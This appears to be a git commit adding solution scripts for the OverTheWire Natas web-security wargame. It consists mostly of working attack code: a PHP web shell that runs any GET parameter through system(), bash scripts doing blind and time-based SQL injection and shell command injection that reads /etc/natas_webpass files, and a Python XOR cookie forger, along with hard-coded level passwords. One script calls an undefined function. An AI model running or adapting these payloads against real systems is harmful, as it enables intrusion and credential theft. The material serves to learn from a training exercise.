OverTheWire

2025-07-15 22:44:06 +10:00 · 2025-07-15 22:44:06 +10:00 · 500329a86b
commit 500329a86b
17 changed files with 889 additions and 0 deletions
--- a/overthewire/natas/scripts/natas11.py
+++ b/overthewire/natas/scripts/natas11.py
@ -0,0 +1,42 @@
+import base64 as b64
+
+PLAINTEXT = '''{"showpassword":"no","bgcolor":"#ffffff"}'''
+COOKIE = 'HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg='
+FORGED_PLAINTEXT = '''{"showpassword":"yes","bgcolor":"#ffffff"}'''
+
+
+
+def xorbytes(x: bytes, y: bytes) -> bytes:
+    Lx, Ly = len(x), len(y)
+    if Lx < Ly: return xorbytes(y, x)
+    
+    return bytes(x[i]^y[i%Ly] for i in range(Lx))
+        
+def extract_key(k: bytes) -> tuple[bytes, int] | None:
+    Lk = len(k)
+    substr = b''
+    length = 0
+    for i in range(Lk):
+        substr += k[i:i+1]
+        length += 1 
+        if k == substr*(Lk//length) + substr[:Lk%length]:
+            return substr, length
+    return None
+
+
+def main() -> None:
+    plaintext = PLAINTEXT.encode()
+    cookie    = b64.b64decode(COOKIE)
+    decoded   = xorbytes(cookie, plaintext)
+    print('Modulated Key:', ''.join(chr(x) for x in decoded))
+    key, key_size = extract_key(decoded)
+
+    forged_cookie = b64.b64encode(xorbytes(FORGED_PLAINTEXT.encode(), key))
+    print('Forged:', forged_cookie)
+    
+
+if __name__ == '__main__':
+    try:
+        main()
+    except (KeyboardInterrupt, EOFError):
+        print('\n[!] Interrupt')
--- a/overthewire/natas/scripts/natas12.php
+++ b/overthewire/natas/scripts/natas12.php
@ -0,0 +1,16 @@
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+    if(isset($_GET['cmd']))
+    {
+        system($_GET['cmd'] . ' 2>&1');
+    }
+?>
+</pre>
+</body>
+</html>
--- a/overthewire/natas/scripts/natas13.php
+++ b/overthewire/natas/scripts/natas13.php
--- a/overthewire/natas/scripts/natas15.sh
+++ b/overthewire/natas/scripts/natas15.sh
@ -0,0 +1,90 @@
+#!/usr/bin/env bash
+
+req() {
+  curl http://natas15.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas15:SdqIqBsFcz3yotlNYErZSZwblkm0lrvx \
+       -d "username=natas16\" and $1 -- " \
+       -sS \
+    | grep exists &>/dev/null
+}
+
+# ie `guess_length "=32"` or `guess_length ">32"`
+guess_length() {
+  req "length(password)$1"
+}
+
+get_length() {
+  echo "[*] Guessing length"
+  local MIN=${1:-1}
+  local MAX=${2:-100}
+  # local PADMAX=${#MAX}
+  local FGUESS="%${#MAX}s - %-${#MAX}s"
+  while true; do
+    printf "[-] Guess: $FGUESS\r" $MIN $MAX
+    if [ $((MAX-MIN)) -eq 1 ]; then
+      break
+    fi;
+    
+    local MID=$(( (MAX+MIN)/2 ))
+    guess_length ">$MID" && MIN=$MID || MAX=$MID
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+  return $MAX
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')"
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            PREFIX="${PREFIX}${chars:MIN-1:1}"
+          else
+            PREFIX="${PREFIX}${chars:MAX-1:1}"
+          fi
+          echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+
+get_length
+LENGTH=$?
+
+exploit_oracle "$LENGTH"
--- a/overthewire/natas/scripts/natas16.sh
+++ b/overthewire/natas/scripts/natas16.sh
@ -0,0 +1,34 @@
+#!/usr/bin/env bash
+
+fcmd() {
+  # echo '$(grep ^$1[a-zA-Z0-9]*$ /etc/natas_webpass/natas17)'
+  echo "\$(grep ^$1.* /etc/natas_webpass/natas17)"
+}
+
+req() {
+  curl http://natas16.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo \
+       -d "needle=$1" \
+       -sS \
+    | grep --after-context 2 "<pre>" \
+    | tail -n1 \
+    | grep "African" &>/dev/null
+}
+
+CHARSET="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
+KNOWN=""
+GUESS=""
+for ((i=0 ; i < 32 ; i++)); do
+  for ((j=0; j<${#CHARSET}; j++)); do
+    c=${CHARSET:j:1}
+    GUESS="$KNOWN$c"
+    echo -en "[*] Guess: $GUESS                                  \r"
+    # echo $(fcmd $guess)
+    req "$(fcmd $GUESS)" || break # && KNOWN=$guess # && break
+  done
+  KNOWN=$GUESS
+  echo -en "[+] Known: $KNOWN\n                                    "
+done
+echo
+
--- a/overthewire/natas/scripts/natas16_2.sh
+++ b/overthewire/natas/scripts/natas16_2.sh
@ -0,0 +1,70 @@
+#!/usr/bin/env bash
+
+fcmd() {
+  echo "\$(grep ^$1.* /etc/natas_webpass/natas17)"
+}
+
+req() {
+  curl http://natas16.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo \
+       -d "needle=$2" \
+       -sS \
+    | grep --after-context 2 "<pre>"
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')"
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            PREFIX="${PREFIX}${chars:MIN-1:1}"
+          else
+            PREFIX="${PREFIX}${chars:MAX-1:1}"
+          fi
+          echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+
+get_length
+LENGTH=$?
+
+exploit_oracle "$LENGTH"
--- a/overthewire/natas/scripts/natas17.sh
+++ b/overthewire/natas/scripts/natas17.sh
@ -0,0 +1,108 @@
+#!/usr/bin/env bash
+
+USERNAME="natas17"
+PASSWORD="EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC"
+TARGET="natas18"
+
+DELAY=4
+PREFIX="5mxv8BZZVSMzzYPcY95M9m"
+
+req() {
+  CMD=$@
+  curl "http://$USERNAME.natas.labs.overthewire.org/index.php" \
+       -X POST \
+       -u "$USERNAME:$PASSWORD" \
+       -d "username=natas18\" AND $CMD AND SLEEP($DELAY) # " \
+       -sS &>/dev/null
+}
+
+time_req() (
+  export STAT
+  export CMD="$@"
+  (time (req $CMD; STAT=$?)) \
+    |& grep real \
+    |  awk '{print substr($2, 3, 1)}'
+  return $STAT
+)
+
+# ie `guess_length "=32"` or `guess_length ">32"`
+guess_length() {
+  ELAPSED=$(time_req "LENGTH(password)$1")
+  return $(( ELAPSED < DELAY ))
+}
+
+get_length() {
+  echo "[*] Guessing length"
+  local MIN=${1:-1}
+  local MAX=${2:-100}
+  # local PADMAX=${#MAX}
+  local FGUESS="%${#MAX}s-%-${#MAX}s"
+  while true; do
+    printf "[-] Guess: $FGUESS\r" $MIN $MAX
+    if [ $((MAX-MIN)) -eq 1 ]; then
+      break
+    fi;
+    
+    local MID=$(( (MAX+MIN)/2 ))
+    guess_length ">$MID" && MIN=$MID || MAX=$MID
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+  return $MAX
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  ELAPSED=$(time_req "REGEXP_LIKE(password, '^$1[a-zA-Z0-9]*\$', 'c')")
+  return $(( ELAPSED < DELAY ))
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          local NEWCHAR
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            NEWCHAR=${chars:MIN-1:1}
+          else
+            NEWCHAR=${chars:MAX-1:1}
+          fi
+          PREFIX="$PREFIX$NEWCHAR"
+          echo -e "[+] Update: $NEWCHAR -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+get_length
+LENGTH=$?
+exploit_oracle "$LENGTH"